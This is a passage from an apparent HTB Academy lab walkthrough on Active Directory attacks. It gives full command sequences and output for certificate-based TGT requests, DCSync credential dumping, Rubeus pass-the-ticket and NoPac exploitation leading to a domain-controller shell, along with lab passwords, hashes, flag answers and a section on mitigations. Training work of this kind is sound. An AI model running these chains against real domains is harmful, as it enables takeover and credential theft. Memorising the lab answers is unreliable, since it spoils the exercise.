ZnNYd6CLq2N6Pew6hMSUwIwYJKoZIhvcNAQkVMRYEFLqyF797X2SL//FR1NM+UQsli2GgMC0wITAJBgUrDgMCGgUABBQ84uiZwm1Pz70+e0p2GZNVZDXlrwQIyr7YCKBdGmY=
[*] Skipping user ACADEMY-EA-DC01$ since attack was already performed

Certificate-to-TGT Conversion

Step 4: TGT Request with PKI Authentication

# Use obtained certificate to request TGT
python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGSI...SNIP...CKBdGmY= dc01.ccache

# TGT generation output:
2022-04-05 15:56:33,239 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2022-04-05 15:56:33,362 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2022-04-05 15:56:33,395 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2022-04-05 15:56:33,396 minikerberos INFO     70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275
INFO:minikerberos:70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275
2022-04-05 15:56:33,401 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

Step 5: Environment Configuration and DCSync

# Set Kerberos ccache environment variable
export KRB5CCNAME=dc01.ccache

# Perform DCSync attack with obtained TGT
secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

# DCSync results:
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
inlanefreight.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::
[*] Kerberos keys grabbed
inlanefreight.local\administrator:aes256-cts-hmac-sha1-96:de0aa78a8b9d622d3495315709ac3cb826d97a318ff4fe597da72905015e27b6
inlanefreight.local\administrator:aes128-cts-hmac-sha1-96:95c30f88301f9fe14ef5a8103b32eb25
inlanefreight.local\administrator:des-cbc-md5:70add6e02f70321f
[*] Cleaning up...

Alternative Attack Paths

Method 1: Direct Hash Extraction with getnthash.py

# Extract NT hash using U2U and PAC decryption
python /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$

# Hash extraction output:
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
313b6f423cd1ee07e91315b4919fb4ba

# Use extracted hash for DCSync
secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c435b514a4eeaad3b435b51404fe:313b6f423cd1ee07e91315b4919fb4ba

Method 2: Windows Rubeus Pass-the-Ticket

# Use certificate with Rubeus for TGT request and PTT
.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /certificate:MIIStQIBAzC...SNIP...IkHS2vJ51Ry4= /ptt

# Rubeus execution output:
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.2

[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] Building AS-REQ (w/ PKINIT preauth) for: 'INLANEFREIGHT.LOCAL\ACADEMY-EA-DC01$'
[*] Using domain controller: 172.16.5.5:88
[+] TGT request successful!
[+] Ticket successfully imported!

# Verify ticket import
klist

# Perform DCSync with Mimikatz
.\mimikatz.exe
mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt

🎯 HTB Academy Lab Solutions

Lab Environment Details

  • Attack Host: ATTACK01 (SSH access with htb-student:HTB_@cademy_stdnt!)

  • Target Domain: INLANEFREIGHT.LOCAL

  • Domain Controller: 172.16.5.5

  • Available Credentials: forend:Klmcargo2

πŸ” Question 1: "Which two CVEs indicate NoPac.py may work? (Format: ####-#####&####-#####, no spaces)"

CVE Research and Answer

Based on the NoPac vulnerability documentation and attack methodology:

Answer: 2021-42278&2021-42287

Explanation:

  • CVE-2021-42278: Security Account Manager (SAM) bypass vulnerability allowing SamAccountName manipulation

  • CVE-2021-42287: Kerberos Privilege Attribute Certificate (PAC) vulnerability in ADDS enabling privilege escalation

πŸš€ Question 2: "Apply what was taught in this section to gain a shell on DC01. Submit the contents of flag.txt located in the DailyTasks directory on the Administrator's desktop."

Complete Solution Walkthrough

Step 1: SSH to Attack Host

# Connect to ATTACK01
ssh htb-student@<target-ip>
# Password: HTB_@cademy_stdnt!

Step 2: Navigate to NoPac Directory

# Change to NoPac exploit directory
cd /opt/noPac

Step 3: Scan for Vulnerability

# Test if target is vulnerable to NoPac
sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap

Step 4: Execute NoPac for Shell Access

# Obtain SYSTEM shell on Domain Controller
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

Step 5: Navigate to Flag Location

# From semi-interactive shell, navigate to Administrator desktop
C:\Windows\system32> cd C:\Users\Administrator\Desktop\DailyTasks
C:\Users\Administrator\Desktop\DailyTasks> dir
C:\Users\Administrator\Desktop\DailyTasks> type flag.txt

Alternative Method - DCSync Approach:

# Use NoPac for DCSync instead of shell
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator

# Use extracted administrator hash for authentication
crackmapexec smb 172.16.5.5 -u administrator -H <extracted_hash>

Step 5: Flag Retrieval

# Navigate to flag location and display contents
C:\Windows\system32> type C:\Users\Administrator\Desktop\DailyTasks\flag.txt
D0ntSl@ckonN0P@c!

🎯 Answer: D0ntSl@ckonN0P@c!

πŸ›‘οΈ Defensive Measures and Mitigations

NoPac Mitigations

Immediate Actions

# Set ms-DS-MachineAccountQuota to 0 (prevents machine account addition)
Set-ADDomain -Identity "DC=inlanefreight,DC=local" -MachineAccountQuota 0

# Monitor for suspicious machine account creation
Get-ADComputer -Filter {Created -gt (Get-Date).AddDays(-1)} -Properties Created | Select Name, Created

Long-term Hardening

  • Patch Management: Apply CVE-2021-42278 and CVE-2021-42287 patches

  • Account Monitoring: Monitor for unusual computer account creation patterns

  • Privilege Reviews: Regular review of accounts with machine creation rights

  • Detection Rules: Implement SIEM rules for SamAccountName modifications

PrintNightmare Mitigations

Service Hardening

# Disable Print Spooler service on non-print servers
Stop-Service -Name "Spooler" -Force
Set-Service -Name "Spooler" -StartupType Disabled

# Remove unnecessary print drivers
Remove-PrinterDriver -Name "Generic / Text Only" -Force

Group Policy Configuration

  • Print Driver Installation: Restrict driver installation to administrators only

  • Point and Print: Disable point and print functionality via GPO

  • Package Point and Print: Configure secure package point and print settings

PetitPotam Mitigations

Certificate Services Hardening

# Enable Extended Protection for Authentication
# Configure Certificate Authority Web Enrollment for HTTPS only
# Disable NTLM authentication for Domain Controllers

Network Controls

  • NTLM Relay Protection: Implement SMB signing and channel binding

  • Certificate Template Security: Review and harden certificate templates

  • Network Segmentation: Isolate Certificate Authority from general network

  • LDAP Authentication: Use Kerberos instead of NTLM where possible

πŸ“Š Key Takeaways

Technical Mastery Achieved

  1. Bleeding Edge Exploitation: Proficiency with latest AD attack vectors

  2. Multi-Vector Attacks: Understanding of various domain compromise paths

  3. Certificate Abuse: Advanced PKI and ADCS exploitation techniques

  4. Tool Proficiency: Mastery of NoPac, PrintNightmare, and PetitPotam tools

Professional Skills Developed

  • Rapid Adaptation: Ability to quickly implement new attack techniques

  • Risk Assessment: Understanding impact and exploitability of recent vulnerabilities

  • Client Communication: Effectively explaining cutting-edge threats to stakeholders

  • Patch Prioritization: Identifying critical vulnerabilities requiring immediate attention

Attack Methodology Mastery

Vulnerability Research β†’ Tool Setup β†’ Target Assessment β†’ Exploitation β†’ Domain Compromise
    (CVE Analysis)      (Environment)   (Scanning)       (Execution)    (Full Control)

Defensive Insights

  • Patch Management: Critical importance of timely security updates

  • Attack Surface Reduction: Disabling unnecessary services and features

  • Monitoring Requirements: Detection strategies for advanced persistent threats

  • Incident Response: Rapid containment procedures for domain compromise

πŸ”‘ Complete mastery of bleeding edge Active Directory vulnerabilities - from theoretical understanding through practical exploitation to defensive implementation - representing cutting-edge enterprise penetration testing capabilities for the most current threat landscape!

PreviousKerberos "Double Hop" ProblemNextMiscellaneous Misconfigurations

Last updated